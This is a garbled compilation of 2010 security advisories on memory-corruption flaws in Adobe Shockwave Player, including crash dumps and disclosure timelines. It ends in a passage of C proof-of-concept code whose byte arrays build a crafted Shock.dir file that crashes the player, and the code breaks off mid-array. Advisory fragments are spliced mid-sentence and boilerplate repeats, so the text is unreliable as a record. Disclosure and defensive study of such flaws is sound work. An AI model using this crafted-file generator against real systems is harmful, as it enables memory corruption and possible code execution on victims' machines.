http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-02-02 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0053 | CVE-2010-0130 | Adobe Shockwave Player Integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Integer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via a crafted .dir (aka Director) file. Adobe Shockwave Player is prone to a remote-code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English).
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
08/03/2010 - Vendor notified.
08/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0130 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-22/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0100 | CVE-2010-1280 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file, related to (1) an erroneous dereference and (2) a certain Shock.dir file.
Attackers can exploit these issues to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
NOTE: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). Director) file is related to (1) incorrect dereferencing and (2) the Shock.dir file.
These people now have access to some of the best the Web has to offer - including
dazzling 3D games and entertainment, interactive product demonstrations, and online
learning applications. The vulnerable software fails to sanitize user input when
processing .dir files resulting in a crash and overwrite of a few memory registers.
Tested on: Microsoft Windows XP Professional SP3 (English)
Version tested: 11.5.6.606
====================================================================================================
(f94.ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8
eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll -
DIRAPI!Ordinal14+0x3b16:
68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????
----------------------------------------------------------------------------------------------------
EAX FFFFFFFF
ECX 41414141
EDX FFFFFFFF
EBX 00000018
ESP 0012F3B4
EBP 02793578
ESI 0012F3C4
EDI 02793578
EIP 69009F1F IML32.69009F1F
====================================================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - Macedonian Information Security Research & Development Laboratory
http://www.zeroscience.mk
19.09.2009
Zero Science Lab Advisory ID: ZSL-2010-4937
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Adobe Advisory ID: APSB10-12
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-12.html
CVE ID: CVE-2010-1280
Disclosure timeline: [19.09.2009] Vulnerability discovered.
[09.03.2010] Vendor contacted with sent PoC files.
[09.03.2010] Vendor replied.
[21.03.2010] Asked vendor for confirmation.
[21.03.2010] Vendor verifies the weakness.
[06.05.2010] Vendor reveals patch release date.
[11.05.2010] Coordinated public advisory.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#define FFORMAT "Shock.dir"
FILE *fp;
char shocks[] = {
0x58, 0x46, 0x49, 0x52, 0x2C, 0x23, 0x00, 0x00, 0x33, 0x39, 0x56, 0x4D, 0x70, 0x61, 0x6D, 0x69,
0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x82, 0x07, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x6D,
0x38, 0x03, 0x00, 0x00, 0x18, 0x00, 0x14, 0x00, 0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,
0x18, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x17, 0x00, 0x00, 0x00, 0x58, 0x46, 0x49, 0x52,
0x2C, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x70, 0x61, 0x6D, 0x69, 0x18, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x88, 0x8F, 0xE2, 0x0B, 0x70, 0x61, 0x6D, 0x6D, 0x38, 0x03, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE4, 0x6A, 0xE2, 0x0B, 0x2A, 0x59, 0x45, 0x4B, 0x74, 0x01, 0x00, 0x00,
0x6C, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x53, 0x41, 0x43,
0x93, 0x00, 0x00, 0x00, 0xE4, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00, 0xD8, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x80, 0x1C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00,
0x86, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,
0x00, 0x00, 0x00, 0x00, 0x7E, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00 //252
};
char shocke[] = {
0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x94, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0xF4, 0x1C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00, 0x00, 0x00,
0x6A, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44,
0x64, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x74, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0xF6, 0x18, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00,
0x54, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56,
0xA8, 0x00, 0x00, 0x00, 0x8E, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x43, 0x53, 0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x3E, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x54, 0x22, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00,
0x46, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
0x6E, 0x61, 0x68, 0x43, 0x06, 0x00, 0x00, 0x00, 0x5C, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04, 0x00, 0x00, 0x6A, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,
0x00, 0x00, 0x00, 0x00, 0x3E, 0x22, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00,
0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00, 0x38, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x19, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x99, 0x01, 0x00, 0x00,
0x8C, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47,
0x10, 0x00, 0x00, 0x00, 0x2E, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x46, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x54, 0x1B, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00,
0x74, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x59, 0x45, 0x4B,
0x74, 0x01, 0x00, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
0x0B, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0x15, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x46, 0x43, 0x52, 0x44, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46,
0x0D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x70, 0x6D, 0x58, 0x46, 0x1C, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x4C, 0x73, 0x43, 0x4D, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x46, 0x44, 0x4D,
0x1B, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x1E, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x64, 0x72, 0x6F, 0x53, 0x19, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x53, 0x52, 0x45, 0x56,
0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0x13, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x11, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x43, 0x53, 0x57, 0x56, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58,
0x1F, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x05, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x09, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,
0x66, 0x6E, 0x69, 0x43, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,
0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,
0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,
0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x08, 0x00, 0x00, 0x00,
0x00, 0x04, 0x01, 0x00, 0x20, 0x6C, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x64, 0x00, 0x00, 0x00,
0x00, 0x64, 0x07, 0x82, 0x00, 0x6C, 0x00, 0x70, 0x02, 0x4C, 0x02, 0xF0, 0x00, 0x01, 0x00, 0x01,
0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xFF, 0x00, 0x20, 0xFD, 0x00,
0x00, 0x00, 0x00, 0x00, 0x07, 0x82, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x01, 0x50, 0x00, 0x1E, 0x00, 0x02, 0x0C, 0x3C, 0x00, 0x00, 0x00, 0x3C,
0x3F, 0xD7, 0xE6, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x9B,
0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x14, 0x00, 0x04,
0x00, 0x01, 0x00, 0x01, 0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x3B, 0x20, 0x43, 0x6F,
0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x31, 0x39, 0x39, 0x34, 0x2D, 0x32, 0x30, 0x30,
0x38, 0x2C, 0x20, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x20, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x73,
0x20, 0x49, 0x6E, 0x63, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x65, 0x64, 0x2E, 0x20, 0x20,
0x41, 0x6C, 0x6C, 0x20, 0x52, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20, 0x52, 0x65, 0x73, 0x65, 0x72,
0x76, 0x65, 0x64, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x44, 0x65,
0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69,
0x6E, 0x67, 0x20, 0x54, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20,
0x61, 0x6E, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B,
0x20, 0x54, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x70, 0x72, 0x6F, 0x76, 0x69,
0x64, 0x65, 0x73, 0x20, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69,
